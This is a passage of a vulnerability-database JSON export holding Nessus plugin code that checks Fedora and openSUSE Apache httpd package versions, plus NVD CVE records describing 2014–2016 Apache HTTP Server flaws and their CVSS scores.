script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"httpd-2.4.25-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T12:32:28", "description": "This update for apache2 provides the following fixes :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest 
could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add NotifyAccess=all to systemd service files to prevent\n warnings in the log when using mod_systemd (bsc#980663).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-04-03T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-2017-417)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo"], "id": "OPENSUSE-2017-417.NASL", "href": "https://www.tenable.com/plugins/nessus/99155", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-417.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99155);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n 
script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-417)\");\n script_summary(english:\"Check for the openSUSE-2017-417 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 provides the following fixes :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add NotifyAccess=all to systemd service files to prevent\n warnings in the log when using mod_systemd (bsc#980663).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016712\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980663\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-debugsource-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-devel-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-event-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-event-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-example-pages-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-prefork-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-prefork-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-utils-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-utils-debuginfo-2.4.16-18.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.1\", reference:\"apache2-worker-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-worker-debuginfo-2.4.16-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2020-10-03T12:10:51", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2016. Notes: none.", "edition": 2, "cvss3": {}, "published": "2017-05-11T14:30:00", "title": "CVE-2016-8073", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2016-8073"], "modified": "2017-05-11T14:30:00", "cpe": [], "id": "CVE-2016-8073", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8073", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-02T06:14:29", "description": "The handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers.", "edition": 6, "cvss3": {}, "published": "2014-12-15T18:59:00", "title": "CVE-2014-3583", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3583"], "modified": "2017-10-03T01:29:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/o:apple:mac_os_x:10.10.2", "cpe:/o:apple:mac_os_x:10.9.5", "cpe:/a:apache:http_server:2.4.10", "cpe:/o:apple:os_x_server:5.0.3", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:apple:mac_os_x:10.10.0", "cpe:/o:apple:mac_os_x:10.10.3", "cpe:/o:apple:mac_os_x:10.10.1", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2014-3583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3583", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:os_x_server:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:13", "description": "The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-05T19:59:00", "title": "CVE-2016-8740", "type": "cve", "cwe": ["CWE-399", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8740"], "modified": "2018-04-25T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.19", "cpe:/a:apache:http_server:2.4.21", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.18", "cpe:/a:apache:http_server:2.4.22", "cpe:/a:apache:http_server:2.4.23"], "id": "CVE-2016-8740", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8740", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.21:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "The Apache HTTP Server through 2.4.23 follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote 
attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an \"httpoxy\" issue. NOTE: the vendor states \"This mitigation has been assigned the identifier CVE-2016-5387\"; in other words, this is not a CVE ID for a vulnerability.", "edition": 9, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-19T02:00:00", "title": "CVE-2016-5387", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5387"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/a:apache:http_server:2.4.23", "cpe:/o:fedoraproject:fedora:24", "cpe:/a:redhat:jboss_web_server:2.1.0", "cpe:/a:hp:system_management_homepage:7.5.5.0", "cpe:/o:oracle:linux:7", "cpe:/o:oracle:linux:5.0", "cpe:/o:fedoraproject:fedora:23", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2016-5387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5387", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:hp:system_management_homepage:7.5.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_web_server:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:13", "description": "Apache HTTP Server, in all releases prior to 2.2.32 and 2.4.25, was liberal in the whitespace accepted from requests and sent in response lines and headers. Accepting these different behaviors represented a security concern when httpd participates in any chain of proxies or interacts with back-end application servers, either through mod_proxy or using conventional CGI mechanisms, and may result in request smuggling, response splitting and cache pollution.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-27T21:29:00", "title": "CVE-2016-8743", "type": "cve", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8743"], "modified": 
"2018-04-25T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.18", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4"], "id": "CVE-2016-8743", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8743", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. 
This made it vulnerable to padding oracle attacks, particularly with CBC.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-27T21:29:00", "title": "CVE-2016-0736", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0736"], "modified": "2018-04-25T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.19", "cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.21", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.22", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.0", "cpe:/a:apache:http_server:2.4.14"], "id": "CVE-2016-0736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0736", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:a:apache:http_server:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:04", "description": "In Apache HTTP Server versions 2.4.0 to 2.4.23, malicious input to mod_auth_digest can cause the server to crash, and each instance continues to crash even for subsequently valid requests.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-27T21:29:00", "title": "CVE-2016-2161", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, 
